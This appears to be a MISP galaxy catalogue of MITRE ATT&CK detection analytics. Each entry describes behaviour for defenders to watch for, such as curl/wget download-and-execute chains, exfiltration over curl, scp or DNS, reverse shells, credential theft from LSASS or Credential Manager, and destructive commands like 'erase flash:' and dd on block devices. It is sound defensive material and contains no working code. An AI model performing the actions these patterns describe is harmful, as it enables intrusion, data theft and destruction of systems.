Metadata key Value
external_id AN0673
mitre_platforms ['macOS']

Analytic 0376 - AN0376

Creation of VSCode tunnel configuration file combined with interactive remote session via code CLI or ssh with JetBrains gateway.

Internal MISP references

UUID a0a0f8e9-7a55-4450-8569-7a0e1c0aac0b which can be used as unique global reference for Analytic 0376 - AN0376 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0376
mitre_platforms ['Linux']

Analytic 0637 - AN0637

Initial process initiates outbound connection to first-stage C2, receives payloads or commands, then spawns or injects into a second process that establishes a new outbound connection to an unrelated destination (second-stage C2).

Internal MISP references

UUID f13ff1ad-5c7b-4136-b5cb-7a5663c3c54f which can be used as unique global reference for Analytic 0637 - AN0637 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0637
mitre_platforms ['Windows']

Analytic 0386 - AN0386

Abnormal invocation of diskutil, asr, or low-level APIs (IOKit) to erase/partition drives. Correlate process execution with unified log entries showing destructive disk operations.

Internal MISP references

UUID 2016853a-07eb-4df4-a471-69b55f82b34d which can be used as unique global reference for Analytic 0386 - AN0386 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0386
mitre_platforms ['macOS']

Analytic 0368 - AN0368

Detects file exfiltration using tools like curl, scp, or custom binaries over protocols such as FTP, HTTP/S, or DNS tunneling, especially outside baseline user behavior.

Internal MISP references

UUID 7402eb3b-9349-478a-a8e9-7ee72c4b67c5 which can be used as unique global reference for Analytic 0368 - AN0368 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0368
mitre_platforms ['Linux']

Analytic 0863 - AN0863

A compromised package/update (deb/rpm/tarball/AppImage/vendor updater) is installed, writing/overwriting files in /usr/local/bin, /usr/bin, /opt, or ~/.local; first run executes unexpected shells/curl/wget and connects to unapproved hosts. Correlate package/updater execution → file writes/replace → first-run child processes → egress.

Internal MISP references

UUID b6f88f17-e80f-4c75-99a5-f752880196aa which can be used as unique global reference for Analytic 0863 - AN0863 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0863
mitre_platforms ['Linux']

Analytic 0683 - AN0683

Monitor call log records from corporate devices for unusual or unauthorized numbers, especially repeated calls to/from known malicious phone numbers. Correlate with subsequent system events (e.g., browser navigation, remote management tool execution).

Internal MISP references

UUID caa11058-4906-48b4-ab3f-a650aab6968d which can be used as unique global reference for Analytic 0683 - AN0683 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0683
mitre_platforms ['Windows']

Analytic 0836 - AN0836

macOS-specific permission modification behavioral chain: (1) chmod/chown/chflags process execution, (2) System Integrity Protection (SIP) bypass attempts, (3) Extended attribute (xattr) modifications, (4) Unified log correlation with file system events, (5) Subsequent access to previously restricted resources

Internal MISP references

UUID e564e2b8-542b-4003-a8b7-df9d3396f5b9 which can be used as unique global reference for Analytic 0836 - AN0836 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0836
mitre_platforms ['macOS']

Analytic 0638 - AN0638

Shell script or binary initiates curl/wget request to staging domain, writes output to disk or memory, and shortly afterward launches another process that establishes new outbound connection to a different IP or hostname.

Internal MISP references

UUID e5fcc815-0ab4-4da9-aade-659b87d079da which can be used as unique global reference for Analytic 0638 - AN0638 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0638
mitre_platforms ['Linux']

Analytic 0396 - AN0396

Process creation involving suspicious delays (e.g., Sleep, ping -n loops, WaitForSingleObject), followed by sensitive system access or lateral movement behaviors.

Internal MISP references

UUID 10c89810-d298-42d6-80dd-1228e737e33f which can be used as unique global reference for Analytic 0396 - AN0396 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0396
mitre_platforms ['Windows']

Analytic 0963 - AN0963

User pastes a multi-line or one-liner into a terminal (bash/zsh) that downloads/decodes and executes content. Chain: terminal exec of curl/wget/bash/sh with pipe to interpreter or base64-decode → transient file under /tmp|~/.cache → immediate outbound egress.

Internal MISP references

UUID 1895e723-dcfb-45d4-80fc-aaa0c3963cc9 which can be used as unique global reference for Analytic 0963 - AN0963 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0963
mitre_platforms ['Linux']

Analytic 0639 - AN0639

Initial process using NSURLSession or similar APIs reaches out to known staging domains, followed by creation of a reverse shell or RAT connecting to a second unrelated server.

Internal MISP references

UUID 53ba6028-13cd-449e-aab4-d2f9fea458a4 which can be used as unique global reference for Analytic 0639 - AN0639 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0639
mitre_platforms ['macOS']

Analytic 0936 - AN0936

Execution of erase, format, and reload in immediate sequence from a privileged AAA session

Internal MISP references

UUID 55a0743e-cdc1-44d1-94c7-cf3837e3ef2f which can be used as unique global reference for Analytic 0936 - AN0936 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0936
mitre_platforms ['Network Devices']

Analytic 0693 - AN0693

Remote/API driven creation and start of a container whose image is not on an allow‑list (or is tagged latest), executed by a non-admin principal, and/or started with risky runtime attributes (e.g., --privileged, host PID/NET namespaces, sensitive host path mounts, capability adds). Correlates createstart ➜ first network/process actions from that container within a short time window.

Internal MISP references

UUID c345908d-4f74-4341-a203-8c76be2a136b which can be used as unique global reference for Analytic 0693 - AN0693 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0693
mitre_platforms ['Containers']

Analytic 0369 - AN0369

Detects non-native file transfer via curl, Python scripts, or AppleScript using uncommon protocols like FTP, SMTP, or DNS exfiltration through mDNSResponder abuse.

Internal MISP references

UUID c545f39e-d1a2-4b0e-bdf1-6a84226557e9 which can be used as unique global reference for Analytic 0369 - AN0369 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0369
mitre_platforms ['macOS']

Analytic 0377 - AN0377

Detection of JetBrains or VSCode tunnel profile creation followed by unusual persistent SSH or IDE-based tunnel communications to devtunnel APIs.

Internal MISP references

UUID 1a93a610-7389-4ea7-a053-e99d35a5477a which can be used as unique global reference for Analytic 0377 - AN0377 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0377
mitre_platforms ['macOS']

Analytic 0773 - AN0773

Detection of new admin or role assignment actions within Microsoft 365/O365 environments to elevate access for persistence or lateral movement.

Internal MISP references

UUID 8601dbfa-8767-4328-8809-1930b53b5e31 which can be used as unique global reference for Analytic 0773 - AN0773 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0773
mitre_platforms ['Office Suite']

Analytic 0737 - AN0737

Detects mailbox manipulation or deletion via PowerShell (e.g., Remove-MailboxExportRequest), file deletion from Outlook data stores (Unistore.db), or tampering with quarantined mail logs.

Internal MISP references

UUID ddbf61e2-7dad-40ef-90ef-7bec707b50fd which can be used as unique global reference for Analytic 0737 - AN0737 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0737
mitre_platforms ['Windows']

Analytic 0837 - AN0837

ESXi hypervisor permission modification behavioral chain: (1) SSH access to ESXi host, (2) chmod/chown execution on VMFS datastore files or system configuration, (3) Modification of VM configuration files (.vmx) or virtual disk permissions, (4) Hostd service log correlation, (5) vCenter permission change events if centrally managed

Internal MISP references

UUID 13a1653f-3d4e-4a4f-9619-f8e8a97ec60d which can be used as unique global reference for Analytic 0837 - AN0837 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0837
mitre_platforms ['ESXi']

Analytic 0378 - AN0378

Detects unauthorized access to Windows Credential Manager through anomalous process execution (vaultcmd.exe, rundll32.exe keymgr.dll), suspicious API calls (CredEnumerateA), or direct file access to Credential Locker files. Correlates process creation with subsequent file reads of .vcrd/.vpol files under user Credential Locker directories.

Internal MISP references

UUID 207b58a9-7e3b-41ca-bb5a-c66b24210a83 which can be used as unique global reference for Analytic 0378 - AN0378 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0378
mitre_platforms ['Windows']

Analytic 0873 - AN0873

Detection of browser-based downloads from HTML sources that trigger file creation in temp or user directories followed by execution of new files within short timeframes and suspicious parent-child lineage.

Internal MISP references

UUID 30ae2215-5dd5-4ef2-82bd-965781ef1f42 which can be used as unique global reference for Analytic 0873 - AN0873 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0873
mitre_platforms ['Linux']

Analytic 0783 - AN0783

Detects sequential command-line compression utilities (e.g., gzip, tar, zip, 7z) followed by execution of unpacked files, especially in temp directories or under non-standard locations like /dev/shm or /tmp with ELF binaries.

Internal MISP references

UUID 55083ce8-b00e-4501-97db-829082bdbb48 which can be used as unique global reference for Analytic 0783 - AN0783 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0783
mitre_platforms ['Linux']

Analytic 0387 - AN0387

Execution of destructive CLI commands such as 'erase startup-config', 'erase flash:' or 'format disk' on routers/switches. Detect privilege level escalation preceding destructive commands.

Internal MISP references

UUID 8faa753d-ec3f-4694-9a33-03ce4ccb722f which can be used as unique global reference for Analytic 0387 - AN0387 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0387
mitre_platforms ['Network Devices']

Analytic 0738 - AN0738

Detects the use of mail utilities like mail or mailx to delete mailbox content, or file-level deletion of inbox files from /var/spool/mail/ or /var/mail/ following suspicious sessions.

Internal MISP references

UUID 9933242a-f96e-4b3e-896f-e7335f410a4f which can be used as unique global reference for Analytic 0738 - AN0738 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0738
mitre_platforms ['Linux']

Analytic 0397 - AN0397

Script-based execution of sleep loops or time delay commands (e.g., sleep, ping delay, while-loops) followed by file creation or network connections.

Internal MISP references

UUID 2bbe41df-b8a6-4503-8fb0-028b7387cb1d which can be used as unique global reference for Analytic 0397 - AN0397 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0397
mitre_platforms ['Linux']

Analytic 0973 - AN0973

Detects abuse of fileless storage mechanisms such as Registry keys, WMI classes, and Event Logs used to stage payloads, scripts, or encoded content outside traditional files.

Internal MISP references

UUID 4f5f4b26-0bf0-4f3d-b8ac-1af660923bd2 which can be used as unique global reference for Analytic 0973 - AN0973 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0973
mitre_platforms ['Windows']

Analytic 0793 - AN0793

Monitor mail server logs (Postfix, Sendmail, Exim) for anomalous From headers mismatching authenticated SMTP identities. Detect abnormal relay attempts, spoofed envelope-from values, or large-scale outbound campaigns targeting internal users.

Internal MISP references

UUID 5c7a8194-f0cb-498a-98c6-5928859bf79f which can be used as unique global reference for Analytic 0793 - AN0793 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0793
mitre_platforms ['Linux']

Analytic 0379 - AN0379

Detects unauthorized use of SMTP/IMAP/POP3 by suspicious binaries (e.g., PowerShell, rundll32) to exfiltrate data or beacon via email, often bypassing proxy or content filters.

Internal MISP references

UUID aef3d563-19f5-4d52-b7ad-4c4abadcb568 which can be used as unique global reference for Analytic 0379 - AN0379 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0379
mitre_platforms ['Windows']

Analytic 0739 - AN0739

Detects removal of Apple Mail artifacts via AppleScript or direct deletion of mailbox content in ~/Library/Mail/, especially when preceded by Remote Login or C2-related API access.

Internal MISP references

UUID cd10c7fd-edef-4f85-aff3-9eaa35906b18 which can be used as unique global reference for Analytic 0739 - AN0739 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0739
mitre_platforms ['macOS']

Analytic 0937 - AN0937

Cloud API calls disabling snapshot scheduling, backup policies, versioning, followed by DeleteSnapshot/DeleteVolume operations

Internal MISP references

UUID e50f8247-73da-4461-a560-745ed84f1209 which can be used as unique global reference for Analytic 0937 - AN0937 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0937
mitre_platforms ['IaaS']

Analytic 0838 - AN0838

Detect anomalous chains of memory allocation and execution inside the same process (e.g., VirtualAlloc → memcpy → VirtualProtect → CreateThread). Unlike process injection, reflective code loading does not perform cross-process memory writes — the suspicious activity occurs entirely within the process’s own PID context.

Internal MISP references

UUID 2432f5a3-ddae-4138-9981-f916ad23a1e1 which can be used as unique global reference for Analytic 0838 - AN0838 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0838
mitre_platforms ['Windows']

Analytic 0883 - AN0883

Execution of destructive utilities (dd, shred, wipe) targeting block devices, or processes invoking syscalls to directly overwrite /dev/sd or /dev/nvme partitions. Correlate abnormal file write attempts with shell process execution and block device access.

Internal MISP references

UUID b55c84a0-d045-43f6-a5a9-e8f6edbd275e which can be used as unique global reference for Analytic 0883 - AN0883 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0883
mitre_platforms ['Linux']

Analytic 0388 - AN0388

Execution of InstallUtil.exe from .NET framework directories with arguments specifying non-standard or attacker-supplied assemblies, especially when followed by suspicious child process creation or script execution. Detection also includes correlation of newly created binaries prior to InstallUtil invocation and anomalous command-line usage compared to historical baselines.

Internal MISP references

UUID f3478623-5b5c-482e-96f1-6b225ff8fa70 which can be used as unique global reference for Analytic 0388 - AN0388 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0388
mitre_platforms ['Windows']

Analytic 0938 - AN0938

Correlation of package install event with execution of postinstall scripts containing unknown binaries or abnormal CLI usage. Look for /usr/sbin/installer execution followed by child processes originating from postinstall script.

Internal MISP references

UUID 3ae8f3c1-c3a1-4c45-9231-1bb6f9c61ee1 which can be used as unique global reference for Analytic 0938 - AN0938 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0938
mitre_platforms ['macOS']

Analytic 0983 - AN0983

Detects processes or binaries executed from trusted directories (e.g., System32) or using trusted names (e.g., svchost.exe) where the metadata, hash, or parent process does not align with legitimate activity patterns.

Internal MISP references

UUID 61256fb2-d490-4e1d-b308-665a2d68ec64 which can be used as unique global reference for Analytic 0983 - AN0983 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0983
mitre_platforms ['Windows']

Analytic 0389 - AN0389

Detects credential harvesting via userland API hooking (e.g., SetWindowsHookEx, IAT, or inline patching) by correlating memory modifications with hook installation functions and suspicious module loads in credential-sensitive processes like lsass.exe, explorer.exe, or winlogon.exe.

Internal MISP references

UUID 89e3c3a3-249e-4af3-8885-92c228d88b02 which can be used as unique global reference for Analytic 0389 - AN0389 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0389
mitre_platforms ['Windows']

Analytic 0839 - AN0839

Monitor for in-process mmap + mprotect + execve/execveat activity where memory permissions are changed from writable to executable inside the same process without a corresponding ELF on disk.

Internal MISP references

UUID cfdd2422-7e68-417a-9298-062bac59df0c which can be used as unique global reference for Analytic 0839 - AN0839 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0839
mitre_platforms ['Linux']

Analytic 0893 - AN0893

Execution of commands disabling AAA, logging, or security features on routers/switches. Detect privilege escalation followed by config changes that disable defense mechanisms.

Internal MISP references

UUID dc5bfda5-057d-4bec-b3e6-a6b2117a4134 which can be used as unique global reference for Analytic 0893 - AN0893 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0893
mitre_platforms ['Network Devices']

Analytic 0398 - AN0398

Use of usleep, nanosleep, or NSTimer calls in executables or binaries with no GUI interaction, especially followed by disk/network activity.

Internal MISP references

UUID fbbe7372-5d33-4181-a68a-e68f5da94df7 which can be used as unique global reference for Analytic 0398 - AN0398 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0398
mitre_platforms ['macOS']

Analytic 0939 - AN0939

Detection of maintainer scripts (e.g., postinst, preinst) being modified or executed during dpkg or rpm operations. Watch for script content that spawns additional processes or writes outside package scope.

Internal MISP references

UUID 2f9c7e44-de3a-4fbd-955a-482ef9f341ed which can be used as unique global reference for Analytic 0939 - AN0939 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0939
mitre_platforms ['Linux']

Analytic 0399 - AN0399

Detects unauthorized or anomalous use of command-line interfaces (CLI) on network devices. Focuses on remote access sessions (e.g., SSH/Telnet), privilege escalation within CLI sessions, execution of high-risk commands (e.g., config replace, terminal monitor, no logging), and configuration changes outside of approved windows.

Internal MISP references

UUID 3dc28690-699a-4f6d-ad4b-278aa2dd8c59 which can be used as unique global reference for Analytic 0399 - AN0399 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0399
mitre_platforms ['Network Devices']

Analytic 0993 - AN0993

Detect curl/wget commands saving executable/script payloads to /tmp or /var/tmp followed by execution. Monitor packet captures or IDS/IPS alerts for injected responses or mismatched content types.

Internal MISP references

UUID 5e8af32c-5246-43e1-a7d9-c4d263c7b135 which can be used as unique global reference for Analytic 0993 - AN0993 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0993
mitre_platforms ['Linux']

Analytic 0444 - AN0444

Detects Kerberoasting attempts by monitoring for anomalous Kerberos TGS requests (Event ID 4769) with RC4 encryption (etype 0x17), accounts requesting an unusual number of service tickets in a short period, or service accounts targeted outside normal usage baselines. Also correlates suspicious process activity (e.g., Mimikatz invoking LSASS access) with Kerberos ticket anomalies.

Internal MISP references

UUID 4ab972bf-623b-418b-9647-2c3a56b55083 which can be used as unique global reference for Analytic 0444 - AN0444 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0444
mitre_platforms ['Windows']

Analytic 0544 - AN0544

Detects conditional access policy changes, exclusion of accounts from MFA enforcement, or registration of new MFA factors by non-admin or anomalous users.

Internal MISP references

UUID 33b7f7b2-b79c-4893-bd5c-2d5638bf5786 which can be used as unique global reference for Analytic 0544 - AN0544 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0544
mitre_platforms ['Identity Provider']

Analytic 0454 - AN0454

Detect user account logon attempts that trigger multiple MFA challenges through enterprise identity integrations, especially if MFA push requests are generated without successful interactive login.

Internal MISP references

UUID 801a3652-8772-4b69-8a13-d870be653ef0 which can be used as unique global reference for Analytic 0454 - AN0454 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0454
mitre_platforms ['macOS']

Analytic 0445 - AN0445

Detection of msiexec.exe execution where command-line arguments reference remote MSI packages, UNC paths, HTTP/HTTPS URLs, or DLLs, correlated with subsequent module loads and/or network connections to previously unseen destinations. The behavioral chain links process creation of msiexec.exe with suspicious parameters, network activity to retrieve payloads, and module loading indicative of malicious installation or DLL execution.

Internal MISP references

UUID f27c0482-fbea-47a3-9b19-7302a058a9e5 which can be used as unique global reference for Analytic 0445 - AN0445 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0445
mitre_platforms ['Windows']

Analytic 0644 - AN0644

Monitors Gatekeeper, spctl, and unified log entries for binaries executed with unexpected or untrusted signatures. Correlates file metadata changes with process launches where signature validation is skipped, altered, or fails but the process still executes.

Internal MISP references

UUID 969bd6a3-b89f-4279-9bd2-3fc461880308 which can be used as unique global reference for Analytic 0644 - AN0644 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0644
mitre_platforms ['macOS']

Analytic 0446 - AN0446

Detection of USB-based remote access hardware (e.g., TinyPilot, PiKVM) attached to the host via drive or peripheral enumeration, triggering vendor identifiers or unusual EDID announcements.

Internal MISP references

UUID e1e76ffd-b452-429e-8ea0-a25ba877a2b5 which can be used as unique global reference for Analytic 0446 - AN0446 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0446
mitre_platforms ['Windows']

Analytic 0464 - AN0464

Process opens /dev/bpf* (libpcap) or loads NetworkExtension filter, then after a crafted inbound packet the same process initiates an outbound connection to the trigger origin.

Internal MISP references

UUID e6d04b50-7bdc-480e-9bda-291db9b270f6 which can be used as unique global reference for Analytic 0464 - AN0464 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0464
mitre_platforms ['macOS']

Analytic 0447 - AN0447

Insertion of USB-based hardware proxies (e.g., PiKVM) which register under predictable names (e.g., tinypilot) or mount under known paths (e.g., /opt/tinypilot-privileged).

Internal MISP references

UUID 04e9470e-676f-4af0-add4-8103300ebd19 which can be used as unique global reference for Analytic 0447 - AN0447 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0447
mitre_platforms ['Linux']

Analytic 0744 - AN0744

Sudden spikes in cloud VM CPU usage with outbound traffic to mining pools and unauthorized instance creation.

Internal MISP references

UUID 8e1872c2-906c-4cf8-b0c7-afd448fe1c0b which can be used as unique global reference for Analytic 0744 - AN0744 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0744
mitre_platforms ['IaaS']

Analytic 0474 - AN0474

Firmware flash utility invoked with elevated privileges followed by raw access to firmware device path or changes to boot configuration.

Internal MISP references

UUID a0ecdd41-a051-4ada-9ec1-c29dc0c4ac61 which can be used as unique global reference for Analytic 0474 - AN0474 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0474
mitre_platforms ['Windows']

Analytic 0484 - AN0484

Forged web cookies on Windows endpoints can be detected by monitoring unusual modifications of browser cookie stores (e.g., Chrome SQLite DB, Edge cache) by processes outside of browsers, followed by authentication events to SaaS or IaaS services. Defenders may observe processes writing directly to cookie storage paths or injecting tokens into browser sessions.

Internal MISP references

UUID 305c684a-2b36-4209-9d00-778ed16de763 which can be used as unique global reference for Analytic 0484 - AN0484 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0484
mitre_platforms ['Windows']

Analytic 0844 - AN0844

A source performs a closed-port sequence; the endpoint enables a PF/socketfilterfw rule or a background process binds a port; then a successful connection completes from the same source.

Internal MISP references

UUID 39da0718-fa22-4f77-8bd2-ea8300087658 which can be used as unique global reference for Analytic 0844 - AN0844 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0844
mitre_platforms ['macOS']

Analytic 0448 - AN0448

Attachment of hardware-backed USB KVM devices (e.g., TinyPilot) that enumerate new HID or serial communication interfaces with identifiable metadata.

Internal MISP references

UUID fc3e13fd-cbee-4bb0-aae7-ce1e8af7d768 which can be used as unique global reference for Analytic 0448 - AN0448 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0448
mitre_platforms ['macOS']

Analytic 0494 - AN0494

Detects exploitation of authentication daemons or PAM modules. Defender perspective includes failed or anomalous PAM authentications, abnormal segfaults in authentication services, and exploitation attempts followed by successful unauthorized logins. Correlation identifies memory corruption, replay attempts, and privilege escalation tied to credential services.

Internal MISP references

UUID 3f3ae0da-3005-42d7-afa3-8eaa8da3f700 which can be used as unique global reference for Analytic 0494 - AN0494 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0494
mitre_platforms ['Linux']

Analytic 0944 - AN0944

Detects usage of at command to schedule jobs, followed by job execution and modification of job files under /var/spool/cron/atjobs.

Internal MISP references

UUID 70e28077-c8a6-425f-94c7-a74a7140c7ce which can be used as unique global reference for Analytic 0944 - AN0944 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0944
mitre_platforms ['Linux']

Analytic 0449 - AN0449

Monitor for excessive or anomalous MFA push notifications or token requests, especially when login attempts originate from unusual IPs or geolocations and do not correspond to legitimate user-initiated sessions.

Internal MISP references

UUID f51edea3-e0e8-4090-8e81-a01c3394ba53 which can be used as unique global reference for Analytic 0449 - AN0449 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0449
mitre_platforms ['Identity Provider']

Analytic 0545 - AN0545

Detects API calls to cloud secrets/MFA configurations where MFA enforcement policies are disabled or bypassed.

Internal MISP references

UUID 3090db89-83c0-44bc-a17d-7cb2a6aecb87 which can be used as unique global reference for Analytic 0545 - AN0545 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0545
mitre_platforms ['IaaS']

Analytic 0554 - AN0554

Suspicious rule creation within Outlook or Exchange clients, including auto-move or delete conditions tied to incident or security alert keywords. Defender perspective: correlation between missing inbound emails and newly added mailbox rules.

Internal MISP references

UUID 747a2974-0c77-4c47-9c02-2775025327c6 which can be used as unique global reference for Analytic 0554 - AN0554 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0554
mitre_platforms ['Office Suite']

Analytic 0455 - AN0455

Cause→effect chain: (1) a user or service spawns a shell/PowerShell that queries local/domain password policy via commands/cmdlets (e.g., net accounts, Get-ADDefaultDomainPasswordPolicy, secedit /export); (2) optional directory/LDAP reads from DCs; (3) same principal performs adjacent Discovery or credential-related actions within a short window. Correlate sysmon process creation with PowerShell ScriptBlock and Security logs.

Internal MISP references

UUID ae82099a-0baf-4887-953c-67ef5e2d4470 which can be used as unique global reference for Analytic 0455 - AN0455 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0455
mitre_platforms ['Windows']

Analytic 0465 - AN0465

Defenders may observe unauthorized or anomalous changes to NAT configurations, including the addition of new translation rules or modifications to existing ones. Suspicious behaviors include sudden introduction of NAT mappings bridging segmented networks, new port address translation rules that obscure true source IPs, or traffic flows inconsistent with expected network design. Multi-event correlation includes detecting configuration changes on routers/firewalls, followed by traffic traversing unexpected internal/external address pairs.

Internal MISP references

UUID 72033f2d-a943-40be-862c-051317ec541c which can be used as unique global reference for Analytic 0465 - AN0465 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0465
mitre_platforms ['Network Devices']

Analytic 0654 - AN0654

Suspicious modification of file artifacts (e.g., logs, ISO templates) on ESXi datastores, followed by beaconing or POST operations to external IPs potentially hiding payloads in file-like traffic.

Internal MISP references

UUID 80caf81c-0714-4fa5-8b77-8e2144e316b9 which can be used as unique global reference for Analytic 0654 - AN0654 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0654
mitre_platforms ['ESXi']

Analytic 0645 - AN0645

Detects adversarial abuse of systemd timers by correlating file creation/modification of .timer and .service units in system directories with the execution of abnormal child processes launched by 'systemd' (PID 1), especially as root.

Internal MISP references

UUID a80f58c9-deb2-45ed-a8fb-4f3df5082874 which can be used as unique global reference for Analytic 0645 - AN0645 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0645
mitre_platforms ['Linux']

Analytic 0456 - AN0456

Chain: (1) interactive/non-interactive chage -l, grep/cat of PAM config (e.g., /etc/pam.d/common-password, /etc/security/pwquality.conf); (2) optional reads of /etc/login.defs; (3) same user performs account enumeration or password change attempts shortly after. Use auditd execve and file read events plus shell history collection.

Internal MISP references

UUID bcf6e9cb-fee9-4efd-8998-03de4908448b which can be used as unique global reference for Analytic 0456 - AN0456 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0456
mitre_platforms ['Linux']

Analytic 0546 - AN0546

Detects PAM module modifications or removal of MFA hooks in /etc/pam.d/ configurations, correlated with successful authentications lacking MFA prompts.

Internal MISP references

UUID d0a9cbc4-d190-44fb-b067-27153e35dc49 which can be used as unique global reference for Analytic 0546 - AN0546 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0546
mitre_platforms ['Linux']

Analytic 0564 - AN0564

Suspicious outbound HTTPS connections where the TLS Server Name Indication (SNI) does not match the HTTP Host header, indicating potential use of domain fronting to mask C2 traffic via CDNs.

Internal MISP references

UUID e5cb92b6-75b0-4eed-aa1e-4ea529f50fbb which can be used as unique global reference for Analytic 0564 - AN0564 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0564
mitre_platforms ['Windows']

Analytic 0547 - AN0547

Detects modifications to authorization plugins responsible for MFA enforcement and correlates with suspicious login sessions missing MFA prompts.

Internal MISP references

UUID 3a19d0ff-833f-47ae-81a0-2516e91c7b25 which can be used as unique global reference for Analytic 0547 - AN0547 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0547
mitre_platforms ['macOS']

Analytic 0457 - AN0457

Chain: (1) execution of pwpolicy or MDM/DirectoryService reads of account policies; (2) optional read of /Library/Preferences/com.apple.loginwindow or config profiles; (3) follow-on credential probing or lateral movement by same user/session. Use unified logs and process telemetry.

Internal MISP references

UUID 4f71c7bd-dd25-43c7-ac5c-7a85c7588759 which can be used as unique global reference for Analytic 0457 - AN0457 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0457
mitre_platforms ['macOS']

Analytic 0475 - AN0475

Direct write access to /dev/mem or /sys/firmware combined with usage of firmware flashing utilities (e.g., flashrom).

Internal MISP references

UUID 5b1514b3-e35b-4ea8-bcc1-b8e492d6d3cd which can be used as unique global reference for Analytic 0475 - AN0475 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0475
mitre_platforms ['Linux']

Analytic 0745 - AN0745

High CPU usage by unauthorized containers running mining binaries or public proxy tools.

Internal MISP references

UUID 791ea4ff-7a49-4aa7-a41c-51288031e0f0 which can be used as unique global reference for Analytic 0745 - AN0745 in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
external_id AN0745
